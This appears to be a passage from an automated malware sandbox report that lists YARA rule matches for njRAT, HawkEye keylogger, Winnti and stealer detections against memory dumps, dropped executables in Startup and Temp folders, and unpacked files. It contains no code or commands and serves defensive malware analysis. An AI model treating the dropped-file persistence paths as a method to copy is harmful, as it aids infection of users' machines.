            Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPEDMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 13.2.tmpFB21.tmp.exe.8150000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 13.2.tmpFB21.tmp.exe.8100000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 13.2.tmpFB21.tmp.exe.3068cf8.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
